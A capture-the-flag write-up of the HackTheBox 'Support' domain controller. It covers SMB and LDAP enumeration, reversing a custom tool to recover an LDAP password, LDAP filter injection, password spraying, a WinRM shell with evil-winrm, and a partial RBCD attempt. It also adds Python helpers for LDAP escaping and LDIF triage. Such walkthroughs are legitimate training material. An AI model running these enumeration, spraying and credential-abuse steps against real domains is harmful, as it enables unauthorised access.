Support

1. Information gathering

1.1. nmap

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# nmap 10.10.11.174 -p- -sCV -o nmap.txt -vv
Warning: The -o option is deprecated. Please use -oN
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-30 06:14 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
Initiating Ping Scan at 06:14
Scanning 10.10.11.174 [4 ports]
Completed Ping Scan at 06:14, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:14
Completed Parallel DNS resolution of 1 host. at 06:14, 0.00s elapsed
Initiating SYN Stealth Scan at 06:14
Scanning 10.10.11.174 [65535 ports]
Discovered open port 139/tcp on 10.10.11.174
Discovered open port 135/tcp on 10.10.11.174
Discovered open port 53/tcp on 10.10.11.174
Discovered open port 445/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 1.61% done; ETC: 06:46 (0:31:34 remaining)
Discovered open port 49667/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 5.91% done; ETC: 06:31 (0:16:11 remaining)
SYN Stealth Scan Timing: About 10.96% done; ETC: 06:27 (0:12:20 remaining)
SYN Stealth Scan Timing: About 27.68% done; ETC: 06:21 (0:05:16 remaining)
Discovered open port 49680/tcp on 10.10.11.174
Discovered open port 5985/tcp on 10.10.11.174
Discovered open port 3268/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 41.91% done; ETC: 06:20 (0:03:29 remaining)
SYN Stealth Scan Timing: About 52.53% done; ETC: 06:20 (0:03:05 remaining)
Discovered open port 9389/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 64.18% done; ETC: 06:20 (0:02:11 remaining)
Discovered open port 3269/tcp on 10.10.11.174
Discovered open port 636/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 74.44% done; ETC: 06:19 (0:01:31 remaining)
Discovered open port 593/tcp on 10.10.11.174
Discovered open port 49704/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 80.49% done; ETC: 06:20 (0:01:12 remaining)
Discovered open port 49676/tcp on 10.10.11.174
Discovered open port 389/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 86.77% done; ETC: 06:20 (0:00:50 remaining)
Discovered open port 464/tcp on 10.10.11.174
Discovered open port 88/tcp on 10.10.11.174
Discovered open port 49742/tcp on 10.10.11.174
Discovered open port 49664/tcp on 10.10.11.174
Completed SYN Stealth Scan at 06:19, 353.75s elapsed (65535 total ports)
Initiating Service scan at 06:19
Scanning 19 services on 10.10.11.174
Completed Service scan at 06:20, 55.65s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.174.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:20
NSE Timing: About 99.96% done; ETC: 06:21 (0:00:00 remaining)
Completed NSE at 06:21, 40.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 10.44s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
Nmap scan report for 10.10.11.174
Host is up, received echo-reply ttl 127 (0.10s latency).
Scanned at 2025-05-30 06:14:03 EDT for 459s
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-30 09:58:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49680/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49742/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 19493/tcp): CLEAN (Timeout)
|   Check 2 (port 25330/tcp): CLEAN (Timeout)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 37889/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-05-30T09:59:37
|_  start_date: N/A
|_clock-skew: -21m16s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 460.24 seconds
           Raw packets sent: 131278 (5.776MB) | Rcvd: 243 (10.676KB)

No web service is exposed. The open ports (DNS, Kerberos, LDAP and Global Catalog, SMB, RPC, ADWS on 9389, WinRM on 5985) are the profile of a domain controller for support.htb, and the host name is DC. Note the clock-skew of -21m16s: Kerberos rejects requests outside a 5-minute skew by default, so anything Kerberos-based from the attacking host will need the clock synced to the DC first.

1.2. Basic checks

# SMB null-session check: nxc cannot list shares without an authenticated session (the explicit null session would be -u '' -p ''), but the anonymous smbclient -N listing further down works
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# nxc smb support.htb --shares
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

# LDAP rootDSE info (readable without credentials)
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ldapsearch-ad.py -l 10.10.11.174 -t info 
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=support,DC=htb
[+] defaultNamingContext = DC=support,DC=htb
[+] ldapServiceName = support.htb:dc$@SUPPORT.HTB
[+] naming_contexts = ['DC=support,DC=htb', 'CN=Configuration,DC=support,DC=htb', 'CN=Schema,CN=Configuration,DC=support,DC=htb', 'DC=DomainDnsZones,DC=support,DC=htb', 'DC=ForestDnsZones,DC=support,DC=htb']

# Anonymous share listing with smbclient
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# smbclient -N -L //10.10.11.174

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 


1.3. Pulling the share

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# smbclient -N  //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 967509 blocks available
smb: \> 

One file stands out: UserInfo.exe.zip. The rest are well-known public tools; this one is custom.

1.4. Reversing UserInfo to recover credentials

The program has two functions: find a user, and show a user's details.

When I ran it, though, it reported that the server was not available.

Capture its traffic with Wireshark to see what it is trying to reach. I found that running UserInfo.exe find -first jack -lask mike produces a DNS query for support.htb.
Add a matching hosts entry for support.htb and repeat the request; the result changes:
this time it simply finds no matching user. So query with wildcards instead, which works because the input is passed straight into the LDAP filter:

C:\Users\Administrator\Desktop\UserInfo.exe>UserInfo.exe find  -first * -lask *
raven.clifton
anderson.damian
monroe.david
cromwell.gerard
west.laura
levine.leopoldo
langley.lucy
daughtler.mabel
bardot.mary
stoll.rachelle
thomas.raphael
smith.rosario
wilson.shelby
hernandez.stanley
ford.victoria

That returns a lot of users; save them to a list.
The user command then shows details for a single account:

C:\Users\Administrator\Desktop\UserInfo.exe>UserInfo.exe user -username raven.clifton
First Name:           clifton
Last Name:            raven
Contact:              raven.clifton@support.htb
Last Password Change: 2022/5/28 19:13:53

A batch script to query every one of them:

@echo off
setlocal enableDelayedExpansion

set "usernames=raven.clifton anderson.damian monroe.david cromwell.gerard west.laura levine.leopoldo langley.lucy daughtler.mabel bardot.mary stoll.rachelle thomas.raphael smith.rosario wilson.shelby hernandez.stanley ford.victoria"


for %%u in (%usernames%) do (
    echo --------------------------------------------------
    UserInfo.exe user -username %%u
)
pause
endlocal

Output:

--------------------------------------------------
First Name:           clifton
Last Name:            raven
Contact:              raven.clifton@support.htb
Last Password Change: 2022/5/28 19:13:53
--------------------------------------------------
First Name:           damian
Last Name:            anderson
Contact:              anderson.damian@support.htb
Last Password Change: 2022/5/28 19:13:05
--------------------------------------------------
First Name:           david
Last Name:            monroe
Contact:              monroe.david@support.htb
Last Password Change: 2022/5/28 19:14:39
--------------------------------------------------
First Name:           gerard
Last Name:            cromwell
Contact:              cromwell.gerard@support.htb
Last Password Change: 2022/5/28 19:14:24
--------------------------------------------------
First Name:           laura
Last Name:            west
Contact:              west.laura@support.htb
Last Password Change: 2022/5/28 19:14:55
--------------------------------------------------
First Name:           leopoldo
Last Name:            levine
Contact:              levine.leopoldo@support.htb
Last Password Change: 2022/5/28 19:13:37
--------------------------------------------------
First Name:           lucy
Last Name:            langley
Contact:              langley.lucy@support.htb
Last Password Change: 2022/5/28 19:15:10
--------------------------------------------------
First Name:           mabel
Last Name:            daughtler
Contact:              daughtler.mabel@support.htb
Last Password Change: 2022/5/28 19:15:26
--------------------------------------------------
First Name:           mary
Last Name:            bardot
Contact:              bardot.mary@support.htb
Last Password Change: 2022/5/28 19:14:08
--------------------------------------------------
First Name:           rachelle
Last Name:            stoll
Contact:              stoll.rachelle@support.htb
Last Password Change: 2022/5/28 19:15:42
--------------------------------------------------
First Name:           raphael
Last Name:            thomas
Contact:              thomas.raphael@support.htb
Last Password Change: 2022/5/28 19:13:21
--------------------------------------------------
First Name:           rosario
Last Name:            smith
Contact:              smith.rosario@support.htb
Last Password Change: 2022/5/28 19:12:19
--------------------------------------------------
First Name:           shelby
Last Name:            wilson
Contact:              wilson.shelby@support.htb
Last Password Change: 2022/5/28 19:12:50
--------------------------------------------------
First Name:           stanley
Last Name:            hernandez
Contact:              hernandez.stanley@support.htb
Last Password Change: 2022/5/28 19:12:34
--------------------------------------------------
First Name:           victoria
Last Name:            ford
Contact:              ford.victoria@support.htb
Last Password Change: 2022/5/28 19:15:58

Unfortunately there is nothing useful in this.

But how can this program look up these users at all? Active Directory does not let an anonymous bind read user objects (only the rootDSE, as seen above), so the program must be authenticating to LDAP, and to authenticate it has to carry a credential.

Reverse the binary to recover that credential.
Here IDA Pro with an MCP plugin pulled the password straight out:

support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
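
Added example, not code from the page nor from UserInfo.exe: the lookup the tool evidently performs, rebuilt with the recovered ldap account and Python's ldap3, plus the RFC 4515 escaping the tool lacks (the wildcard query above works only because the input is spliced into the filter verbatim). The exact filter UserInfo.exe builds is an assumption; the domain, account and base DN come from the scan and the recovered credential.

```python
"""Added example, not code from the page or from UserInfo.exe: the lookup that
UserInfo.exe evidently performs, rebuilt with ldap3 and the recovered ldap
account, and the filter escaping the tool is missing. The exact filter string
inside UserInfo.exe is an assumption; host, domain and base DN are from the scan."""

# RFC 4515: characters that change the meaning of a filter must be escaped
_LDAP_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value so user input cannot alter the filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter(first: str, last: str, escape: bool = True) -> str:
    """Search filter for the find command. escape=False reproduces what the
    wildcard query on the page demonstrates: the input is spliced in verbatim,
    so '*' (or a crafted ')(...' fragment) rewrites the query."""
    if escape:
        first, last = escape_filter_value(first), escape_filter_value(last)
    return f"(&(objectClass=user)(givenName={first})(sn={last}))"


def find_users(first: str, last: str, host: str = "10.10.11.174", domain: str = "SUPPORT",
               username: str = "ldap", password: str = "nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz",
               base_dn: str = "DC=support,DC=htb"):
    """Authenticated LDAP search, the same thing the binary does once it can
    resolve support.htb. ldap3 is imported here so the filter helpers above
    stay usable without it installed. Returns (sAMAccountName, mail) pairs."""
    from ldap3 import NTLM, Connection, Server

    conn = Connection(Server(host), user=f"{domain}\\{username}", password=password,
                      authentication=NTLM, auto_bind=True)
    conn.search(base_dn, build_filter(first, last), attributes=["sAMAccountName", "mail"])
    return [(str(e.sAMAccountName), str(e.mail)) for e in conn.entries]


if __name__ == "__main__":
    print(build_filter("*", "*", escape=False))  # filter the tool sends for find -first * -last *
    print(build_filter("*", "*"))                # escaped: matches only a literal '*'
    try:
        for sam, mail in find_users("*", "*"):    # needs a route to the DC
            print(sam, mail)
    except Exception as exc:                      # no DC reachable, or ldap3 missing
        print("LDAP query skipped:", exc)
```

With escape=True the same "* *" input matches nothing, which is the behaviour a tool that takes names from users should have; the unescaped form is what lets one query dump the whole user list.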

1.5. BloodHound

With this credential we can collect the domain data:

┌──(root㉿kali)-[~/Desktop/htb]
└─# bloodhound-python -c All -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 25S
INFO: Compressing output into 20250530105939_bloodhound.zip

A quick look through the graph shows nothing usable from the ldap account itself.

1.6. RID enumeration

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'  --rid-brute
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 
SMB         10.10.11.174    445    DC               498: SUPPORT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.174    445    DC               500: SUPPORT\Administrator (SidTypeUser)
SMB         10.10.11.174    445    DC               501: SUPPORT\Guest (SidTypeUser)
SMB         10.10.11.174    445    DC               502: SUPPORT\krbtgt (SidTypeUser)
SMB         10.10.11.174    445    DC               512: SUPPORT\Domain Admins (SidTypeGroup)
SMB         10.10.11.174    445    DC               513: SUPPORT\Domain Users (SidTypeGroup)
SMB         10.10.11.174    445    DC               514: SUPPORT\Domain Guests (SidTypeGroup)
SMB         10.10.11.174    445    DC               515: SUPPORT\Domain Computers (SidTypeGroup)
SMB         10.10.11.174    445    DC               516: SUPPORT\Domain Controllers (SidTypeGroup)
SMB         10.10.11.174    445    DC               517: SUPPORT\Cert Publishers (SidTypeAlias)
SMB         10.10.11.174    445    DC               518: SUPPORT\Schema Admins (SidTypeGroup)
SMB         10.10.11.174    445    DC               519: SUPPORT\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.174    445    DC               520: SUPPORT\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.174    445    DC               521: SUPPORT\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.174    445    DC               522: SUPPORT\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.174    445    DC               525: SUPPORT\Protected Users (SidTypeGroup)
SMB         10.10.11.174    445    DC               526: SUPPORT\Key Admins (SidTypeGroup)
SMB         10.10.11.174    445    DC               527: SUPPORT\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.174    445    DC               553: SUPPORT\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.174    445    DC               571: SUPPORT\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.174    445    DC               572: SUPPORT\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.174    445    DC               1000: SUPPORT\DC$ (SidTypeUser)
SMB         10.10.11.174    445    DC               1101: SUPPORT\DnsAdmins (SidTypeAlias)
SMB         10.10.11.174    445    DC               1102: SUPPORT\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.174    445    DC               1103: SUPPORT\Shared Support Accounts (SidTypeGroup)
SMB         10.10.11.174    445    DC               1104: SUPPORT\ldap (SidTypeUser)
SMB         10.10.11.174    445    DC               1105: SUPPORT\support (SidTypeUser)
SMB         10.10.11.174    445    DC               1106: SUPPORT\smith.rosario (SidTypeUser)
SMB         10.10.11.174    445    DC               1107: SUPPORT\hernandez.stanley (SidTypeUser)
SMB         10.10.11.174    445    DC               1108: SUPPORT\wilson.shelby (SidTypeUser)
SMB         10.10.11.174    445    DC               1109: SUPPORT\anderson.damian (SidTypeUser)
SMB         10.10.11.174    445    DC               1110: SUPPORT\thomas.raphael (SidTypeUser)
SMB         10.10.11.174    445    DC               1111: SUPPORT\levine.leopoldo (SidTypeUser)
SMB         10.10.11.174    445    DC               1112: SUPPORT\raven.clifton (SidTypeUser)
SMB         10.10.11.174    445    DC               1113: SUPPORT\bardot.mary (SidTypeUser)
SMB         10.10.11.174    445    DC               1114: SUPPORT\cromwell.gerard (SidTypeUser)
SMB         10.10.11.174    445    DC               1115: SUPPORT\monroe.david (SidTypeUser)
SMB         10.10.11.174    445    DC               1116: SUPPORT\west.laura (SidTypeUser)
SMB         10.10.11.174    445    DC               1117: SUPPORT\langley.lucy (SidTypeUser)
SMB         10.10.11.174    445    DC               1118: SUPPORT\daughtler.mabel (SidTypeUser)
SMB         10.10.11.174    445    DC               1119: SUPPORT\stoll.rachelle (SidTypeUser)
SMB         10.10.11.174    445    DC               1120: SUPPORT\ford.victoria (SidTypeUser)
SMB         10.10.11.174    445    DC               2601: SUPPORT\MANAGEMENT$ (SidTypeUser)

1.7. Password reuse check

valid_user.txt holds the SidTypeUser names from the RID brute-force above, one per line. Spraying the ldap password across them only confirms the ldap account itself:

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u valid_user.txt -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'   --continue-on-success |grep +
SMB                      10.10.11.174    445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

1.8. SMB shares (authenticated)

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'   --shares
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.174    445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
SMB         10.10.11.174    445    DC               [*] Enumerated shares
SMB         10.10.11.174    445    DC               Share           Permissions     Remark
SMB         10.10.11.174    445    DC               -----           -----------     ------
SMB         10.10.11.174    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.174    445    DC               C$                              Default share
SMB         10.10.11.174    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.174    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.174    445    DC               support-tools   READ            support staff tools
SMB         10.10.11.174    445    DC               SYSVOL          READ            Logon server share 

1.9. LDAP enumeration

ldapsearch -x -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"

The support user has an info attribute set to Ironside47pleasure40Watchful (info and description are free-text fields that admins sometimes use as password notes):

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20250530101950.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 86107
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 133930902999872286
lastLogoff: 0
lastLogon: 133930753939716104
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133930739906591035
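
Added example, not from the page: read the ldapsearch output above and decode the fields that matter when triaging an account (objectSid, userAccountControl, pwdLastSet, group membership), flagging free-text attributes such as info and description where passwords get parked. SAMPLE_LDIF is the support entry from the dump, trimmed to the attributes used; the SID it decodes is the one klist later prints for support.

```python
"""Added example, not from the page: parse the ldapsearch dump above and decode
the fields that matter when triaging an account, flagging free-text attributes
where admins leave passwords. SAMPLE_LDIF is the support entry from the dump,
trimmed to the attributes used here."""
import base64
import struct
from datetime import datetime, timedelta, timezone

SAMPLE_LDIF = """\
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
sAMAccountName: support
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
userAccountControl: 66048
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
pwdLastSet: 132982099209777070
badPwdCount: 2
"""

UAC_FLAGS = {  # userAccountControl bits worth looking at during triage
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
TEXT_ATTRS = ("info", "description", "comment")  # typical credential leak spots
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _unfold(text: str):
    """LDIF wraps long values; a line starting with a space continues the previous one."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def parse_ldif(text: str):
    """Minimal LDIF reader: one dict per entry, a list of values per attribute.
    'attr:: value' is base64 and is decoded to bytes; '#' lines are comments."""
    entries, entry = [], {}
    for line in _unfold(text):
        if not line.strip():
            if entry:
                entries.append(entry)
            entry = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(": ")
        if attr.endswith(":"):
            attr, value = attr[:-1], base64.b64decode(value)
        entry.setdefault(attr, []).append(value)
    if entry:
        entries.append(entry)
    return entries


def decode_sid(blob: bytes) -> str:
    """Binary SID -> S-1-5-21-...: revision, sub-authority count, 48-bit
    big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def filetime_to_datetime(filetime: int) -> datetime:
    """AD timestamps (pwdLastSet, lastLogon, ...) are 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def uac_flags(value: int):
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def triage(entry: dict) -> dict:
    """Summarise one user entry the way you would read it during an assessment."""
    return {
        "sam": entry.get("sAMAccountName", ["?"])[0],
        "sid": decode_sid(entry["objectSid"][0]),
        "uac": uac_flags(int(entry["userAccountControl"][0])),
        "pwdLastSet": filetime_to_datetime(int(entry["pwdLastSet"][0])),
        "groups": [dn.split(",")[0][3:] for dn in entry.get("memberOf", [])],
        "secrets": {a: entry[a] for a in TEXT_ATTRS if a in entry},
    }


if __name__ == "__main__":
    for user in parse_ldif(SAMPLE_LDIF):
        s = triage(user)
        print(s["sam"], s["sid"], s["uac"], s["groups"], s["pwdLastSet"].isoformat())
        if s["secrets"]:
            print("  possible credential in", s["secrets"])
```

Run it against the full ldapsearch output (ldapsearch -x ... > dump.ldif) instead of SAMPLE_LDIF and every entry with a non-empty info/description comes out flagged, with DONT_EXPIRE_PASSWORD and a 2022 pwdLastSet showing why a password parked in an attribute in 2022 still works.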

That looks like a password; spray it across the user list:

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u valid_user.txt -p 'Ironside47pleasure40Watchful'  --continue-on-success |grep +
SMB                      10.10.11.174    445    DC               [+] support.htb\support:Ironside47pleasure40Watchful 

Now that we have this user's credential, run BloodHound again as support to see what it can reach:

bloodhound-python -c All -u support -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.10.11.174 --zip

It is a member of Remote Management Users (also visible in the memberOf attribute above), so WinRM is available.

1.10. evil-winrm

┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc winrm 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'                   
WINRM       10.10.11.174    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM       10.10.11.174    5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)


┌──(root㉿kali)-[~/Desktop/htb]
└─# evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

*Evil-WinRM* PS C:\Users\support\desktop> type user.txt
b5e7c659b44909e48a1091f60d87d40b

2. RBCD

Check what the support account can do.
(screenshot: BloodHound, support's outbound object control)
It has full control (GenericAll) over the DC computer object, which makes this straightforward.

There are two usual ways to turn full control of a computer object into access: Shadow Credentials or RBCD.
Shadow Credentials needs the DC to support PKINIT, i.e. to have its own key pair and certificate (typically present when AD CS is deployed). That is not the case here, so RBCD it is.

┌──(root㉿kali)-[~/Desktop/htb]
└─# impacket-addcomputer -method LDAPS -computer-name 'c1trus$' -computer-pass 'Admin123!' -dc-host 10.10.11.174 -domain-netbios support.htb  'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] socket ssl wrapping error: [Errno 104] Connection reset by peer

